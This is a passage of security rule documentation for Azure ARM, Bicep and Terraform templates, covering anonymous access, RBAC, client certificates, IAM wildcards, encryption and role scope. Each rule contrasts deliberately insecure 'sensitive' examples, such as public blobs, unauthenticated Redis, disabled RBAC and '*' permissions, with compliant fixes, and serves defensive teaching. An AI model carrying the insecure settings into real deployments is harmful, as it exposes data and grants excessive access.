            "apiVersion": "2022-03-01",
            "name": "example"
        }
    ]
}

For API Management:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.ApiManagement/service",
            "apiVersion": "2022-09-01-preview",
            "name": "example"
        }
    ]
}

For Data Factory Linked Services:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.DataFactory/factories/linkedservices",
            "apiVersion": "2018-06-01",
            "name": "example",
            "properties": {
                "type": "Web",
                "typeProperties": {
                    "authenticationType": "Anonymous"
                }
            }
        }
    ]
}

For Storage Accounts and Storage Containers:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.Storage/storageAccounts",
            "apiVersion": "2022-09-01",
            "name": "example",
            "properties": {
                "allowBlobPublicAccess": true
            }
        }
    ]
}
{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.Storage/storageAccounts",
            "apiVersion": "2022-09-01",
            "name": "example",
            "resources": [
                {
                    "type": "blobServices/containers",
                    "apiVersion": "2022-09-01",
                    "name": "blobContainerExample",
                    "properties": {
                        "publicAccess": "Blob"
                    }
                }
            ]
        }
    ]
}

For Redis Caches:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.Cache/redis",
            "apiVersion": "2022-06-01",
            "name": "example",
            "properties": {
                "redisConfiguration": {
                    "authnotrequired": "true"
                }
            }
        }
    ]
}

Compliant Solution

For App Services and equivalent:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.Web/sites",
            "apiVersion": "2022-03-01",
            "name": "example",
            "resources": [
                {
                    "type": "config",
                    "apiVersion": "2022-03-01",
                    "name": "authsettingsV2",
                    "properties": {
                        "globalValidation": {
                            "requireAuthentication": true,
                            "unauthenticatedClientAction": "RedirectToLoginPage"
                        }
                    }
                }
            ]
        }
    ]
}

For API Management:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.ApiManagement/service",
            "apiVersion": "2022-09-01-preview",
            "name": "example",
            "resources": [
                {
                    "type": "portalsettings",
                    "apiVersion": "2022-09-01-preview",
                    "name": "signin",
                    "properties": {
                        "enabled": true
                    }
                },
                {
                    "type": "apis",
                    "apiVersion": "2022-09-01-preview",
                    "name": "exampleApi",
                    "properties": {
                        "authenticationSettings": {
                            "openid": {
                                "bearerTokenSendingMethods": ["authorizationHeader"],
                                "openidProviderId": "<an OpenID provider ID>"
                            }
                        }
                    }
                }
            ]
        }
    ]
}

For Data Factory Linked Services:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.DataFactory/factories/linkedservices",
            "apiVersion": "2018-06-01",
            "name": "example",
            "properties": {
                "type": "Web",
                "typeProperties": {
                    "authenticationType": "Basic"
                }
            }
        }
    ]
}

For Storage Accounts:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.Storage/storageAccounts",
            "apiVersion": "2022-09-01",
            "name": "example",
            "properties": {
                "allowBlobPublicAccess": false
            }
        }
    ]
}
{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.Storage/storageAccounts",
            "apiVersion": "2022-09-01",
            "name": "example",
            "resources": [
                {
                    "type": "blobServices/containers",
                    "apiVersion": "2022-09-01",
                    "name": "blobContainerExample",
                    "properties": {
                        "publicAccess": "None"
                    }
                }
            ]
        }
    ]
}
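
A Bicep sketch of the compliant storage account configuration, with anonymous blob access disabled at both the account and container level, might look like this (names are illustrative):

```bicep
// Illustrative: public blob access is disabled on the account,
// and the nested container allows no anonymous access.
resource storageAccount 'Microsoft.Storage/storageAccounts@2022-09-01' = {
  name: 'example'
  properties: {
    allowBlobPublicAccess: false // Compliant
  }
}

resource blobContainer 'Microsoft.Storage/storageAccounts/blobServices/containers@2022-09-01' = {
  name: 'example/default/blobContainerExample'
  properties: {
    publicAccess: 'None' // Compliant
  }
}
```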

For Redis Caches:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.Cache/redis",
            "apiVersion": "2022-06-01",
            "name": "example",
            "properties": {
                "redisConfiguration": {}
            }
        }
    ]
}

See

azureresourcemanager:S6383

Disabling Role-Based Access Control (RBAC) on Azure resources can reduce an organization’s ability to protect itself against access controls being compromised.

To be considered safe, access controls must follow the principle of least privilege and correctly segregate duties amongst users. RBAC helps enforce these practices by adapting the organization’s access control needs into explicit role-based policies: it helps keep access controls maintainable and sustainable.

Furthermore, RBAC allows operations teams to work faster during a security incident. It helps to mitigate account theft or intrusions by quickly shutting down accesses.

Ask Yourself Whether

  • This Azure resource is essential for the information system infrastructure.
  • This Azure resource is essential for mission-critical functions.
  • Compliance policies require access to this resource to be enforced through the use of Role-Based Access Control.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Enable Azure RBAC when the Azure resource supports it.
  • For Kubernetes clusters, enable Azure RBAC if Azure AD integration is supported. Otherwise, use the built-in Kubernetes RBAC.

Sensitive Code Example

For AKS Azure Kubernetes Service:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.ContainerService/managedClusters",
      "apiVersion": "2023-03-01",
      "properties": {
        "aadProfile": {
          "enableAzureRBAC": false
        },
        "enableRBAC": false
      }
    }
  ]
}
resource aks 'Microsoft.ContainerService/managedClusters@2023-03-01' = {
  properties: {
    aadProfile: {
      enableAzureRBAC: false    // Sensitive
    }
    enableRBAC: false           // Sensitive
  }
}

For Key Vault:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.KeyVault/vaults",
      "apiVersion": "2022-07-01",
      "properties": {
        "enableRbacAuthorization": false
      }
    }
  ]
}
resource keyVault 'Microsoft.KeyVault/vaults@2022-07-01' = {
  properties: {
    enableRbacAuthorization: false    // Sensitive
  }
}

Compliant Solution

For AKS Azure Kubernetes Service:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.ContainerService/managedClusters",
      "apiVersion": "2023-03-01",
      "properties": {
        "aadProfile": {
          "enableAzureRBAC": true
        },
        "enableRBAC": true
      }
    }
  ]
}
resource aks 'Microsoft.ContainerService/managedClusters@2023-03-01' = {
  properties: {
    aadProfile: {
      enableAzureRBAC: true     // Compliant
    }
    enableRBAC: true            // Compliant
  }
}

For Key Vault:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.KeyVault/vaults",
      "apiVersion": "2022-07-01",
      "properties": {
        "enableRbacAuthorization": true
      }
    }
  ]
}
resource keyVault 'Microsoft.KeyVault/vaults@2022-07-01' = {
  properties: {
    enableRbacAuthorization: true    // Compliant
  }
}

See

azureresourcemanager:S6382

Disabling certificate-based authentication can reduce an organization’s ability to react against attacks on its critical functions and data.

Azure offers various authentication options to access resources: Anonymous connections, Basic authentication, password-based authentication, and certificate-based authentication.

Choosing certificate-based authentication helps bring client/host trust by allowing the host to verify the client and vice versa. It cannot be forged or forwarded by a man-in-the-middle eavesdropper, and the certificate’s private key is never sent over the network so it’s harder to steal than a password.

In case of a security incident, certificates help bring investigators traceability and allow security operations teams to react faster. For example, all compromised certificates could be revoked individually, or an issuing certificate could be revoked which causes all the certificates it issued to become untrusted.

Ask Yourself Whether

  • This Azure resource is essential for the information system infrastructure.
  • This Azure resource is essential for mission-critical functions.
  • Compliance policies require access to this resource to be authenticated with certificates.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Enable certificate-based authentication.

Sensitive Code Example

Where the use of client certificates is controlled by a boolean value, such as:

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.SignalRService/webPubSub",
      "apiVersion": "2020-07-01-preview",
      "name": "example",
      "properties": {
        "tls": {
          "clientCertEnabled": false
        }
      }
    }
  ]
}
resource example 'Microsoft.SignalRService/webPubSub@2020-07-01-preview' = {
  name: 'example'
  properties: {
    tls: {
      clientCertEnabled: false // Sensitive
    }
  }
}
{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites",
      "apiVersion": "2015-08-01",
      "name": "example",
      "properties": {
        "clientCertEnabled": false
      }
    }
  ]
}
resource example 'Microsoft.Web/sites@2015-08-01' = {
  name: 'example'
  properties: {
    clientCertEnabled: false // Sensitive
  }
}

Where the use of client certificates can be made optional, such as:

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites",
      "apiVersion": "2015-08-01",
      "name": "example",
      "properties": {
        "clientCertEnabled": true,
        "clientCertMode": "Optional"
      }
    }
  ]
}
resource example 'Microsoft.Web/sites@2015-08-01' = {
  name: 'example'
  properties: {
    clientCertEnabled: true
    clientCertMode: 'Optional' // Sensitive
  }
}
{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.App/containerApps",
      "apiVersion": "2022-03-01",
      "name": "example",
      "properties": {
        "ingress": {
          "clientCertificateMode": "accept"
        }
      }
    }
  ]
}
resource example 'Microsoft.App/containerApps@2022-03-01' = {
  name: 'example'
  properties: {
    ingress: {
      clientCertificateMode: 'accept' // Sensitive
    }
  }
}

Where client certificates can be used to authenticate outbound requests, such as:

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DataFactory/factories/linkedservices",
      "apiVersion": "2018-06-01",
      "name": "example",
      "properties": {
        "type": "Web",
        "typeProperties": {
          "authenticationType": "Basic"
        }
      }
    }
  ]
}
resource example 'Microsoft.DataFactory/factories/linkedservices@2018-06-01' = {
  name: 'example'
  properties: {
    type: 'Web'
    typeProperties: {
      authenticationType: 'Basic' // Sensitive
    }
  }
}

Where a list of permitted client certificates must be provided, such as:

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DocumentDB/cassandraClusters",
      "apiVersion": "2021-10-15",
      "name": "example",
      "properties": {
        "clientCertificates": []
      }
    }
  ]
}
resource example 'Microsoft.DocumentDB/cassandraClusters@2021-10-15' = {
  name: 'example'
  properties: {
    clientCertificates: [] // Sensitive
  }
}

Where a resource can use both certificate-based and password-based authentication, such as:

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.ContainerRegistry/registries/tokens",
      "apiVersion": "2022-12-01",
      "name": "example",
      "properties": {
        "credentials": {
          "passwords": [
            {
              "name": "password1"
            }
          ]
        }
      }
    }
  ]
}
resource example 'Microsoft.ContainerRegistry/registries/tokens@2022-12-01' = {
  name: 'example'
  properties: {
    credentials: {
      passwords: [ // Sensitive
        {
          name: 'password1'
        }
      ]
    }
  }
}

Compliant Solution

Where the use of client certificates is controlled by a boolean value:

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.SignalRService/webPubSub",
      "apiVersion": "2020-07-01-preview",
      "name": "example",
      "properties": {
        "tls": {
          "clientCertEnabled": true
        }
      }
    }
  ]
}
resource example 'Microsoft.SignalRService/webPubSub@2020-07-01-preview' = {
  name: 'example'
  properties: {
    tls: {
      clientCertEnabled: true // Compliant
    }
  }
}
{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites",
      "apiVersion": "2015-08-01",
      "name": "example",
      "properties": {
        "clientCertEnabled": true,
        "clientCertMode": "Required"
      }
    }
  ]
}
resource example 'Microsoft.Web/sites@2015-08-01' = {
  name: 'example'
  properties: {
    clientCertEnabled: true // Compliant
    clientCertMode: 'Required'
  }
}

Where the use of client certificates can be made optional:

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites",
      "apiVersion": "2015-08-01",
      "name": "example",
      "properties": {
        "clientCertEnabled": true,
        "clientCertMode": "Required"
      }
    }
  ]
}
resource example 'Microsoft.Web/sites@2015-08-01' = {
  name: 'example'
  properties: {
    clientCertEnabled: true
    clientCertMode: 'Required' // Compliant
  }
}
{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.App/containerApps",
      "apiVersion": "2022-03-01",
      "name": "example",
      "properties": {
        "ingress": {
          "clientCertificateMode": "require"
        }
      }
    }
  ]
}
resource example 'Microsoft.App/containerApps@2022-03-01' = {
  name: 'example'
  properties: {
    ingress: {
      clientCertificateMode: 'require' // Compliant
    }
  }
}

Where client certificates can be used to authenticate outbound requests:

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DataFactory/factories/linkedservices",
      "apiVersion": "2018-06-01",
      "name": "example",
      "properties": {
        "type": "Web",
        "typeProperties": {
          "authenticationType": "ClientCertificate"
        }
      }
    }
  ]
}
resource example 'Microsoft.DataFactory/factories/linkedservices@2018-06-01' = {
  name: 'example'
  properties: {
    type: 'Web'
    typeProperties: {
      authenticationType: 'ClientCertificate' // Compliant
    }
  }
}

Where a list of permitted client certificates must be provided:

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DocumentDB/cassandraClusters",
      "apiVersion": "2021-10-15",
      "name": "example",
      "properties": {
        "clientCertificates": [
          {
            "pem": "[base64-encoded certificate]"
          }
        ]
      }
    }
  ]
}
resource example 'Microsoft.DocumentDB/cassandraClusters@2021-10-15' = {
  name: 'example'
  properties: {
    clientCertificates: [ // Compliant
      {
        pem: '[base64-encoded certificate]'
      }
    ]
  }
}

Where a resource can use both certificate-based and password-based authentication:

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.ContainerRegistry/registries/tokens",
      "apiVersion": "2022-12-01",
      "name": "example",
      "properties": {
        "credentials": {
          "certificates": [
            {
              "name": "certificate1",
              "encodedPemCertificate": "[base64-encoded certificate]"
            }
          ]
        }
      }
    }
  ]
}
resource example 'Microsoft.ContainerRegistry/registries/tokens@2022-12-01' = {
  name: 'example'
  properties: {
    credentials: {
      certificates: [ // Compliant
        {
          name: 'certificate1'
          encodedPemCertificate: '[base64-encoded certificate]'
        }
      ]
    }
  }
}

See

terraform:S6304

A policy that allows identities to access all resources in an AWS account may violate the principle of least privilege. Suppose an identity has permission to access all resources even though it only requires access to some non-sensitive ones. In this case, unauthorized access to and disclosure of sensitive information may occur.

Ask Yourself Whether

The AWS account has more than one resource with different levels of sensitivity.

A risk exists if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended to apply the least privilege principle, i.e. to grant access only to the necessary resources. A good practice to achieve this is to organize or tag resources depending on the sensitivity level of the data they store or process. This makes secure access control less error-prone to manage.
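The organize-or-tag practice can be sketched in Terraform; the tag key, values, and bucket names below are illustrative assumptions, not part of the rule:

```hcl
# Hypothetical example: classify resources with a sensitivity tag so that
# IAM policies can later be scoped per sensitivity level instead of using "*".
resource "aws_s3_bucket" "public_assets" {
  bucket = "example-public-assets"

  tags = {
    DataSensitivity = "low" # illustrative tag key/value
  }
}

resource "aws_s3_bucket" "customer_records" {
  bucket = "example-customer-records"

  tags = {
    DataSensitivity = "high"
  }
}
```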

Sensitive Code Example

Update permission is granted for all policies using the wildcard (*) in the Resource property:

resource "aws_iam_policy" "noncompliantpolicy" {
  name        = "noncompliantpolicy"

  policy = jsonencode({
    Version = "2012-10-17"
    Statement = [
      {
        Action = [
          "iam:CreatePolicyVersion"
        ]
        Effect   = "Allow"
        Resource = [
          "*" # Sensitive
        ]
      }
    ]
  })
}

Compliant Solution

Restrict update permission to the appropriate subset of policies:

resource "aws_iam_policy" "compliantpolicy" {
  name        = "compliantpolicy"

  policy = jsonencode({
    Version = "2012-10-17"
    Statement = [
      {
        Action = [
          "iam:CreatePolicyVersion"
        ]
        Effect   = "Allow"
        Resource = [
          "arn:aws:iam::${data.aws_caller_identity.current.account_id}:policy/team1/*"
        ]
      }
    ]
  })
}

Exceptions

  • Should not be raised on key policies (when AWS KMS actions are used).
  • Should not be raised on policies not using any resources (if and only if all actions in the policy never require resources).

See

terraform:S6388

Using unencrypted cloud storage services can lead to data exposure. If adversaries gain physical access to the storage medium, they are able to access unencrypted information.

Ask Yourself Whether

  • The service contains sensitive information that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt cloud storage services that contain sensitive information.

Sensitive Code Example

For azurerm_data_lake_store:

resource "azurerm_data_lake_store" "store" {
  name             = "store"
  encryption_state = "Disabled"  # Sensitive
}

Compliant Solution

For azurerm_data_lake_store:

resource "azurerm_data_lake_store" "store" {
  name             = "store"
  encryption_state = "Enabled"
  encryption_type  = "ServiceManaged"
}

See

terraform:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. This means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease the chances that attackers successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that the use of the http protocol is being deprecated by major web browsers.

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

For AWS Kinesis Data Streams server-side encryption:

resource "aws_kinesis_stream" "sensitive_stream" {
    encryption_type = "NONE" # Sensitive
}

For Amazon ElastiCache:

resource "aws_elasticache_replication_group" "example" {
    replication_group_id = "example"
    replication_group_description = "example"
    transit_encryption_enabled = false  # Sensitive
}

For Amazon ECS:

resource "aws_ecs_task_definition" "ecs_task" {
  family = "service"
  container_definitions = file("task-definition.json")

  volume {
    name = "storage"
    efs_volume_configuration {
      file_system_id = aws_efs_file_system.fs.id
      transit_encryption = "DISABLED"  # Sensitive
    }
  }
}

For Amazon OpenSearch domains:

resource "aws_elasticsearch_domain" "example" {
  domain_name = "example"
  domain_endpoint_options {
    enforce_https = false # Sensitive
  }
  node_to_node_encryption {
    enabled = false # Sensitive
  }
}

For Amazon MSK communications between clients and brokers:

resource "aws_msk_cluster" "sensitive_data_cluster" {
    encryption_info {
        encryption_in_transit {
            client_broker = "TLS_PLAINTEXT" # Sensitive
            in_cluster = false # Sensitive
        }
    }
}

For AWS Load Balancer Listeners:

resource "aws_lb_listener" "front_load_balancer" {
  protocol = "HTTP" # Sensitive

  default_action {
    type = "redirect"

    redirect {
      protocol = "HTTP"
    }
  }
}

The HTTP protocol is used for GCP Region Backend Services:

resource "google_compute_region_backend_service" "example" {
  name                            = "example-service"
  region                          = "us-central1"
  health_checks                   = [google_compute_region_health_check.region.id]
  connection_draining_timeout_sec = 10
  session_affinity                = "CLIENT_IP"
  load_balancing_scheme           = "EXTERNAL"
  protocol                        = "HTTP" # Sensitive
}

Compliant Solution

For AWS Kinesis Data Streams server-side encryption:

resource "aws_kinesis_stream" "compliant_stream" {
    encryption_type = "KMS"
}

For Amazon ElastiCache:

resource "aws_elasticache_replication_group" "example" {
    replication_group_id = "example"
    replication_group_description = "example"
    transit_encryption_enabled = true
}

For Amazon ECS:

resource "aws_ecs_task_definition" "ecs_task" {
  family = "service"
  container_definitions = file("task-definition.json")

  volume {
    name = "storage"
    efs_volume_configuration {
      file_system_id = aws_efs_file_system.fs.id
      transit_encryption = "ENABLED"
    }
  }
}

For Amazon OpenSearch domains:

resource "aws_elasticsearch_domain" "example" {
  domain_name = "example"
  domain_endpoint_options {
    enforce_https = true
  }
  node_to_node_encryption {
    enabled = true
  }
}

For Amazon MSK communications between clients and brokers, data in transit is encrypted by default, allowing you to omit writing the encryption_in_transit configuration. However, if you need to configure it explicitly, this configuration is compliant:

resource "aws_msk_cluster" "sensitive_data_cluster" {
    encryption_info {
        encryption_in_transit {
            client_broker = "TLS"
            in_cluster = true
        }
    }
}

For AWS Load Balancer Listeners:

resource "aws_lb_listener" "front_load_balancer" {
  protocol = "HTTP"

  default_action {
    type = "redirect"

    redirect {
      protocol = "HTTPS"
    }
  }
}

The HTTPS protocol is used for GCP Region Backend Services:

resource "google_compute_region_backend_service" "example" {
  name                            = "example-service"
  region                          = "us-central1"
  health_checks                   = [google_compute_region_health_check.region.id]
  connection_draining_timeout_sec = 10
  session_affinity                = "CLIENT_IP"
  load_balancing_scheme           = "EXTERNAL"
  protocol                        = "HTTPS"
}

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Insecure protocol scheme followed by loopback addresses like 127.0.0.1 or localhost.
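As an illustration of this exception (the resource and parameter names are hypothetical), a clear-text URL targeting a loopback address would not be reported:

```hcl
# Not reported: the insecure scheme targets a loopback address.
resource "aws_ssm_parameter" "local_endpoint" {
  name  = "local-endpoint" # hypothetical parameter name
  type  = "String"
  value = "http://localhost:8080"
}
```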

See

terraform:S6303

Using unencrypted RDS DB resources exposes data to unauthorized access.
This includes database data, logs, automatic backups, read replicas, snapshots, and cluster metadata.

This situation can occur in a variety of scenarios, such as:

  • A malicious insider working at the cloud provider gains physical access to the storage device.
  • Unknown attackers penetrate the cloud provider’s logical infrastructure and systems.

After a successful intrusion, the underlying applications are exposed to:

  • theft of intellectual property and/or personal data
  • extortion
  • denial of services and security bypasses via data corruption or deletion

AWS-managed encryption at rest reduces this risk with a simple switch.

Ask Yourself Whether

  • The database contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to enable encryption at rest on any RDS DB resource, regardless of the engine.
In any case, no further maintenance is required as encryption at rest is fully managed by AWS.

Sensitive Code Example

For aws_db_instance and aws_rds_cluster:

resource "aws_db_instance" "example" {
  storage_encrypted = false # Sensitive, disabled by default
}

resource "aws_rds_cluster" "example" {
  storage_encrypted = false # Sensitive, disabled by default
}

Compliant Solution

For aws_db_instance and aws_rds_cluster:

resource "aws_db_instance" "example" {
  storage_encrypted = true
}

resource "aws_rds_cluster" "example" {
  storage_encrypted = true
}

See

terraform:S6302

A policy that grants all permissions may indicate improper access control, which violates the principle of least privilege. Suppose an identity is granted full permissions to a resource even though it only requires read permission to work as expected. In this case, resources may be unintentionally overwritten, resulting in loss of information.

Ask Yourself Whether

Identities obtaining all the permissions:

  • only require a subset of these permissions to perform the intended function.
  • have monitored activity showing that only a subset of these permissions is actually used.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to apply the least privilege principle, i.e. to grant identities only the necessary permissions. A good practice is to start with the very minimum set of permissions and to refine the policy over time. To fix overly permissive policies already deployed in production, one strategy is to review the monitored activity and reduce the set of permissions to those actually used.

Sensitive Code Example

A customer-managed policy for AWS that grants all permissions by using the wildcard (*) in the Action property:

resource "aws_iam_policy" "example" {
  name = "noncompliantpolicy"

  policy = jsonencode({
    Version   = "2012-10-17"
    Statement = [
      {
        Action   = [
          "*" # Sensitive
        ]
        Effect   = "Allow"
        Resource = [
          aws_s3_bucket.mybucket.arn
        ]
      }
    ]
  })
}

A customer-managed policy for GCP that grants all permissions by assigning the project owner role in the role property:

resource "google_project_iam_binding" "example" {
  project = "example"
  role    = "roles/owner" # Sensitive

  members = [
    "user:jane@example.com",
  ]
}

Compliant Solution

A customer-managed policy for AWS that grants only the required permissions:

resource "aws_iam_policy" "example" {
  name = "compliantpolicy"

  policy = jsonencode({
    Version   = "2012-10-17"
    Statement = [
      {
        Action   = [
          "s3:GetObject"
        ]
        Effect   = "Allow"
        Resource = [
          aws_s3_bucket.mybucket.arn
        ]
      }
    ]
  })
}

A customer-managed policy for GCP that grants restricted permissions by assigning a narrowly scoped role in the role property:

resource "google_project_iam_binding" "example" {
  project = "example"
  role    = "roles/actions.Viewer"

  members = [
    "user:jane@example.com",
  ]
}

See

terraform:S6308

Amazon Elasticsearch Service (ES) is a managed service to host Elasticsearch instances.

To harden domain (cluster) data in case of unauthorized access, ES provides data-at-rest encryption if the Elasticsearch version is 5.1 or above. Enabling encryption at rest will help protect:

  • indices
  • logs
  • swap files
  • data in the application directory
  • automated snapshots

Thus, if adversaries gain physical access to the storage medium, they cannot access the data.

Ask Yourself Whether

  • The database contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to encrypt Elasticsearch domains that contain sensitive information.

Encryption and decryption are handled transparently by ES, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_elasticsearch_domain:

resource "aws_elasticsearch_domain" "elasticsearch" {
  encrypt_at_rest {
    enabled = false  # Sensitive, disabled by default
  }
}

Compliant Solution

For aws_elasticsearch_domain:

resource "aws_elasticsearch_domain" "elasticsearch" {
  encrypt_at_rest {
    enabled = true
  }
}

See

terraform:S6385

Why is this an issue?

Defining a custom role for a Subscription or a Management Group that allows all actions gives that role the same capabilities as the built-in Owner role. It’s recommended to limit the number of subscription owners in order to mitigate the risk of being breached through a compromised owner.

This rule raises an issue when a custom role has an assignable scope set to a Subscription or a Management Group and allows all actions (*).

How to fix it

Code examples

Noncompliant code example

resource "azurerm_role_definition" "example" { # Sensitive
  name        = "example"
  scope       = data.azurerm_subscription.primary.id

  permissions {
    actions     = ["*"]
    not_actions = []
  }

  assignable_scopes = [
    data.azurerm_subscription.primary.id
  ]
}

Compliant solution

resource "azurerm_role_definition" "example" {
  name        = "example"
  scope       = data.azurerm_subscription.primary.id

  permissions {
    actions     = ["Microsoft.Compute/*"]
    not_actions = []
  }

  assignable_scopes = [
    data.azurerm_subscription.primary.id
  ]
}

Resources

Documentation

terraform:S6387

Azure RBAC roles can be assigned to users, groups, or service principals. A role assignment grants permissions on a predefined set of resources called "scope".

The widest scopes a role can be assigned to are:

  • Subscription: a role assigned with this scope grants access to all resources of this Subscription.
  • Management Group: a role assigned with this scope grants access to all resources of all the Subscriptions in this Management Group.

In case of security incidents involving a compromised identity (user, group, or service principal), limiting its role assignment to the narrowest scope possible helps separate duties and limits what resources are at risk.

Ask Yourself Whether

  • The user, group, or service principal doesn’t use the entirety of the resources in the scope to operate on a day-to-day basis.
  • It is possible to follow the Separation of Duties principle and split the scope into multiple role assignments with a narrower scope.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

  • Limit the scope of the role assignment to a Resource or Resource Group.
  • Apply the least privilege principle by assigning roles granting as few permissions as possible.

Sensitive Code Example

resource "azurerm_role_assignment" "example" {
  scope                = data.azurerm_subscription.primary.id # Sensitive
  role_definition_name = "Reader"
